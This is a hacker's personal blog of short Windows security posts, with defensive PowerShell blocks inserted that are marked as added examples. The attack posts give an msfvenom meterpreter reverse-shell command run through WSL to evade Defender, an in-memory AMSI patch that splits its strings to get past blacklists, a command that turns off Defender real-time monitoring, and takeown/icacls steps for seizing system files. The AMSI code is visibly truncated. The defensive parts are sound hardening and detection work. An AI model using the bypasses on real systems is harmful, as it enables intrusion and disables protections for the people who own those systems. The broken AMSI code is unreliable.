Just another vulnerable WordPress site

Author: Kazmin

Bypassing Windows Defender with the Windows Subsystem for Linux!

After watching BHIS’s Sacred Cash Cow Tipping 2020 I was inspired to try out a few of the techniques BHIS demo’d, and this is a pretty fun and odd one.

There are a few issues with WSL that make it a really poor choice for hacking without some configuration. The interesting one here is that WSL does not use VHDs or emulate a Linux filesystem; in fact, you can navigate to %AppData%/Local/Packages/$LinuxDistro/LocalState/rootfs from Windows and interact with the entire filesystem.

This also means that every file you make/drop to WSL is scanned by Windows Defender. Don’t even try to install metasploit.

However, as BHIS points out, ELF files are not scanned by Defender. So to test this, fire up a normal metasploit session, do a quick msfvenom -f elf -p linux/x64/meterpreter_reverse_tcp LHOST=$IP LPORT=4444 > payload.elf, drop it to disk and run it through WSL. A shell comes back, no questions asked.

This is pretty cool and exciting and all, but there are a few drawbacks. The first issue is that since you’re running a Linux payload from within WSL, you can’t use typical metasploit Windows goodies like priv and kiwi without first pivoting.

The other issue is that this technique has a lot of preconditions. You obviously need initial access first, but you also need the target to have WSL installed, with a Linux distribution installed. This is not most workstations. Installing a Linux distro into WSL requires you to first enable the WSL feature in Windows, then restart the machine, and finally install the distro of your choice. Steps 1 and 3 both require administrative privileges by default, so I don’t see a practical use-case unless you can somehow install WSL without admin or the machine is preconfigured.

It’s a very neat trick though, and runs all processes through WSL, which allows you to bypass application whitelisting as well.

Windows Hardening Stuff

This is a random list of notes for Windows Hardening

Against Responder

“Turn off multicast name resolution” Enabled

Don’t need SMB? Turn it off

From services.msc, disable and stop the “Server” service (AKA LanmanServer), then restart.

Need SMB but worried about Eternal Blue?

Set-SmbServerConfiguration -EnableSMB1Protocol $false

Fuck it why not just turn it all off for good measure?
Set-SmbServerConfiguration -EnableSMB2Protocol $false
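The notes above as an audit-and-apply script. This is an added example, not part of the original notes: it reads the current state of each item (LLMNR through the registry value that the “Turn off multicast name resolution” policy writes, the Server service, SMB1/SMB2) and, when run with -Apply, turns off LLMNR and SMB1. It also reports whether the WSL optional feature from the first post is enabled, purely as inventory. The registry path, feature names and cmdlet parameters are the documented Windows ones; the function names and the -Apply switch are my own.

```powershell
# Added example, not from the original notes: audit the settings above and apply
# the safe subset. Run from an elevated PowerShell prompt.
param([switch]$Apply)

# Registry value written by the GPO "Turn off multicast name resolution" (Enabled => 0).
$LlmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'

function Get-HardeningState {
    $llmnr = Get-ItemProperty -Path $LlmnrKey -Name EnableMulticast -ErrorAction SilentlyContinue
    $smb   = Get-SmbServerConfiguration
    $svc   = Get-Service -Name LanmanServer
    $wsl   = Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
    [pscustomobject]@{
        LlmnrDisabled    = ($null -ne $llmnr -and $llmnr.EnableMulticast -eq 0)
        SmbServerStatus  = $svc.Status
        SmbServerStartup = $svc.StartType
        Smb1Enabled      = $smb.EnableSMB1Protocol
        Smb2Enabled      = $smb.EnableSMB2Protocol
        WslFeature       = $wsl.State   # inventory only: WSL is a precondition for the ELF trick above
    }
}

function Set-Hardening {
    # LLMNR off: Responder-style poisoning relies on hosts answering multicast name lookups.
    New-Item -Path $LlmnrKey -Force | Out-Null
    Set-ItemProperty -Path $LlmnrKey -Name EnableMulticast -Value 0 -Type DWord
    # SMB1 off (the dialect MS17-010 / EternalBlue targets). SMB2/3 stays on here because
    # domain file shares and group policy processing depend on it.
    Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    # Remove the SMB1 component as well, so a configuration change alone cannot bring it back.
    Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart | Out-Null
}

function Disable-SmbServer {
    # Only for hosts that share nothing: the same as Stop + Disable "Server" in services.msc.
    Stop-Service -Name LanmanServer -Force
    Set-Service -Name LanmanServer -StartupType Disabled
}

'Before:'; Get-HardeningState | Format-List
if ($Apply) {
    Set-Hardening
    'After:'; Get-HardeningState | Format-List
}
```

Run it once without -Apply to see where a host stands, then with -Apply. Disable-SmbServer is deliberately not called automatically; invoke it by hand on machines you have confirmed share nothing, because disabling LanmanServer also breaks admin shares and remote management that rides on SMB.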


Bypassing Windows Defender and AMSI 9/22/19 With Privileges

These steps assume you have access to PowerShell with admin rights. For the record, I’m not sure if this will work on a domain-joined machine where conflicting policies may have been set. The AMSI script works by patching the AMSI DLL in memory, which means it’s not persistent and does not require privileges. The Defender command changes a registry value, which means it is persistent and also requires privileges.

Disable AMSI

$win32 = @"
using System.Runtime.InteropServices;
using System;
public class Win32 {
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
public static extern IntPtr LoadLibrary(string name);
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect
Add-Type $win32
# String Concatenation to bypass blacklist
$ptr = [Win32]::GetProcAddress([Win32]::LoadLibrary("amsi.dll"), "AmsiScan"+"Buffer")
$b = 0
[Win32]::VirtualProtect($ptr, [UInt32]5, 0x40, [Ref]$b)
$buf = New-Object Byte[] 7
$buf[0] = 0x66; $buf[1] = 0xb8; $buf[2] = 0x01; $buf[3] = 0x00; $buf[4] = 0xc2; $buf[5] = 0x18; $buf[6] = 0x00;
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 7)

Credit to Avi Gimpel; the exact code in his blog post no longer works because it contains “AmsiScanBuffer”, but with a little concatenation it still works great!

Disable Defender

PowerShell Set-MpPreference -DisableRealtimeMonitoring 1

Credit to Shawn Brink
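The two actions in this post are both loud if you know where to look. The following is an added example, not code from the original post or from the authors credited above: it queries the local Defender operational log for the real-time-protection and configuration-change events that Set-MpPreference produces, and the PowerShell operational log for script blocks that load amsi.dll, call VirtualProtect and write with Marshal::Copy, which the concatenation trick does not hide because those three names still appear literally. It assumes Script Block Logging is enabled; the helper at the top turns it on through the documented policy key. Event IDs and log names are the standard Windows ones; function names are my own.

```powershell
# Added example, not from the original post: hunt for the two actions described
# above in the local event logs. Run elevated on the host being checked.

function Enable-ScriptBlockLogging {
    # Documented policy key for PowerShell Script Block Logging (event 4104).
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

function Get-DefenderTamperEvents {
    param([int]$Hours = 24)
    # 5001 = real-time protection disabled, 5004 = real-time protection configuration
    # changed, 5007 = antimalware platform configuration changed (Set-MpPreference lands here).
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 5004, 5007
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, @{ n = 'Message'; e = { $_.Message -replace '\s+', ' ' } }
}

function Get-AmsiPatchIndicators {
    param([int]$Hours = 24)
    # 4104 carries the script block text in Properties[2] and the block id in Properties[3].
    # The patch above loads amsi.dll, makes the page writable with VirtualProtect and
    # overwrites it with Marshal::Copy; the concatenated API name is not needed to spot it.
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object {
            $text = [string]$_.Properties[2].Value
            $text -match 'amsi\.dll' -and $text -match 'VirtualProtect' -and $text -match 'Marshal\]::Copy'
        } |
        Select-Object TimeCreated,
            @{ n = 'ScriptBlockId'; e = { $_.Properties[3].Value } },
            @{ n = 'Snippet'; e = {
                $t = [string]$_.Properties[2].Value
                $t.Substring(0, [Math]::Min(200, $t.Length)) } }
}

Get-DefenderTamperEvents   | Format-Table -AutoSize
Get-AmsiPatchIndicators    | Format-List
```

Enable-ScriptBlockLogging has to have been run before the activity you want to see; 4104 is not retroactive. On the prevention side, Defender’s Tamper Protection setting (Windows 10 1903 and later) makes Set-MpPreference -DisableRealtimeMonitoring fail even for a local administrator, which removes the second half of this post entirely.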

Mounting a Shared Folder in Kali and VMware Workstation/Player 2019

I hate that I have to write this, but a lot of the solutions out there are really old and misleading. I’ve spent hours before just trying to get this to work. This method works with Kali 2019.3, and the day of this writing is 9/13/2019.

First install the relevant tools:

sudo apt install -y open-vm-tools open-vm-tools-desktop

Then make sure you share your folder through VM -> Settings -> Options tab and then set it to “Always Enabled”

Then run the following command:

sudo vmhgfs-fuse .host:/ /mnt/ -o allow_other -o uid=1000

Then run:

ls -la /mnt/

And you should see your shared folders popping up!

Alternatively, I just found out while writing this that there is a mount-shared-folders.sh bash script on the desktop of the VMware distribution. That probably works too.

Credit to con-f-use in one of the worst aging askubuntu questions ever.

Kali Proxmark Quick Setup

This massive one-liner should work to install all the source.

sudo apt install -y p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libpcsclite-dev && git clone https://github.com/Proxmark/proxmark3.git && cd proxmark3 && make clean && make all

Now install the bootloader.

./client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf

Now install the full image. I encountered issues flashing the full image wherein my Proxmark3 RD4 had both A & C lights lit red, and it would not reconnect. Try this command to flash the full image, and if you have the same issue I did, follow the next steps.

./client/flasher /dev/ttyACM0 armsrc/obj/fullimage.elf

If you have issues like I did, stop the Modem Manager service, unplug the device, hold the white button, plug it back in, and reflash the full image. Once flashing has completed, you can release the button.

systemctl stop ModemManager.service

Finally, connect to your Proxmark 🙂

sudo ./client/proxmark3 /dev/ttyACM0

Credit to Alex Dib

Git Setup CheatSheet

Setting up your user

git config --global user.name "Your name here"
git config --global user.email "your_email@example.com"
add your ssh key (in ~/.ssh/id_rsa.pub) to your github account
ssh -T git@github.com

credit to kbroman

Setting up a new repository

Create an empty repository on github
git init
git add .
git remote add origin git@github.com:username/new_repo
git commit -m "First Commit!"

git push -u origin master

credit to kbroman

Setting up a .gitignore file

vim .gitignore
git rm -r --cached .
git add .
git commit -m "Added .gitignore"
git push

I had issues with this in powershell for some reason, using the Windows Subsystem for Linux worked like a charm though.

To make a new commit

git add .
git commit -m "next commit"
git push

I also highly recommend using git status before creating a new commit to check that everything is working correctly.

Overriding Windows TrustedInstaller Permissions

For a single file, all you have to do is:

icacls C:\FULL_PATH_TO_FILE /grant Administrators:F

For an entire directory, it’s a bit longer:

takeown /F C:\FULL_PATH_TO_FOLDER /r /d y
icacls C:\FULL_PATH_TO_FOLDER /grant Administrators:F
icacls C:\FULL_PATH_TO_FOLDER /grant Administrators:F /t

Basically, this can be used to modify and overwrite Windows’s system files and other things you’re not supposed to touch. This can also be done from the GUI by assigning yourself to be the owner of the file, applying the change, closing the window, opening the permissions again, elevating to admin, and finally setting the permissions you would like.

Credit to Micah in the comments.
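The takeown/icacls sequence above leaves two durable traces: the file’s owner is no longer NT SERVICE\TrustedInstaller, and BUILTIN\Administrators holds FullControl. The following is an added example, not from the original post: it walks a protected directory and reports files showing either trace. The identity strings and the Get-Acl/FileSystemRights API are standard Windows; the function name, parameters and output shape are my own.

```powershell
# Added example, not from the original post: report files under a protected directory
# whose ACL looks like the takeown/icacls sequence above was run on them. Run elevated.
function Find-TamperedSystemFiles {
    param(
        [string]$Path   = "$env:SystemRoot\System32",
        [string]$Filter = '*.exe',
        [switch]$Recurse
    )
    $expectedOwner = 'NT SERVICE\TrustedInstaller'
    $fullControl   = [System.Security.AccessControl.FileSystemRights]::FullControl

    Get-ChildItem -Path $Path -Filter $Filter -File -Recurse:$Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $acl = Get-Acl -LiteralPath $_.FullName -ErrorAction SilentlyContinue
            if (-not $acl) { return }

            # An explicit or inherited Allow rule granting Administrators every bit of FullControl.
            $adminFull = $acl.Access | Where-Object {
                $_.IdentityReference -eq 'BUILTIN\Administrators' -and
                $_.AccessControlType -eq 'Allow' -and
                (($_.FileSystemRights -band $fullControl) -eq $fullControl)
            }

            if ($acl.Owner -ne $expectedOwner -or $adminFull) {
                [pscustomobject]@{
                    File       = $_.FullName
                    Owner      = $acl.Owner
                    AdminsFull = [bool]$adminFull
                    LastWrite  = $_.LastWriteTime
                }
            }
        }
}

Find-TamperedSystemFiles | Format-Table -AutoSize
# Follow up on anything flagged with 'sfc /verifyonly' to see whether the binary itself
# still matches the component store.
```

Not every file under System32 is TrustedInstaller-owned on a clean install, so compare the output against a reference image of the same build rather than treating every hit as tampering; the combination of a changed owner, Administrators:F and a recent LastWrite on a core binary is the pattern worth chasing.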

Making this blog – Expectations

This blog is totally gonna get pwned within 24 hours of Google indexing it.

Things you can expect from this blog:

  • Posts about beginners’ and maybe advanced cyber security
  • Every single bug in discord.py
  • Musings on esoteric game systems
  • Delusions about Game Development
  • A splash of Personal Development
  • The World of Worldbuilding
  • Maybe some magic? (not the TCG)

Things you can’t expect from this blog:

  • Common sense
  • Pop culture
  • The revelation that I am secretly Bruce Schneier

© 2020 Kazam
